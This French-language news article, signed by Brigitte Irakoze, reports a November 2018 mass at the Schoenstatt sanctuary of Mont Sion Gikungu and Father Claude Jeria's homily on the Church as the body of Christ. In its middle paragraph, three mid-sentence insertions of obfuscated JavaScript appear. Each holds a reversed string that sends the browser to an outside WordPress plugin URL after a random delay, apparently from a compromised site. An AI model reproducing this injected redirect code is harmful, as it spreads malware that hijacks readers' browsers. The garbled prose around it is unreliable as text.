Père Claude Jeria (Photo d’archives)

Vendredi le 09 Novembre 2018 il y a eu une messe qui a été célébrée par le Père Claude JERIA dans la Chapelle Eucharistique du Sanctuaire Marial de Schoenstatt Mont Sion Gikungu, à partir de 17h30.

Dans son l’homélie, Père Claude a signalé que cette journée était la fête de l’Eglise-mère à laquelle nous appartenons. « Notre Eglise est hiérarchisée : il y a le Saint Siège où demeure le Pape ; la cathédrale de chaque diocèse ainsi que la paroisse .» c’est la joie pour nous parce que nous avons l’Eglise notre mère » . ajouta le Père Claude. Il y a aussi un sanctuaire de Marie et cela montre que nous appartenons à Marie.

Selon le P. Jeria , l’Eglise est le corps du Christ et nous, nous sommes les membres de cette Eglise. Comme pour les membres d’un corps, chaque partie a une fonction à exercer. Aussi chaque chrétien toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit avoir quelque chose à faire .Dans une famille, le père a ses responsabilités ; la maman a aussi ses fonctions, mais aussi les enfants toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doivent remplir leurs devoirs. « Chacun de nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit remplir ses fonctions dans l’Eglise pour qu’il y ait une harmonie.» a-t-poursuivi.

Il a continué en disant que nous devons respecter et protéger notre corps parce qu’un jour il sera un corps glorifié. Marie notre mère a été elle aussi temple du Seigneur et voilà elle a été glorifiée . » Il a ajouté : « Jésus habite en nous au moment de la communion  et dans ce cas nous devenons le temple du christ.»

Il a clôturé en interpellant tout un chacun de ressentir en lui qu’il est un temple de Dieu.

Brigitte IRAKOZE

Laisser un commentaire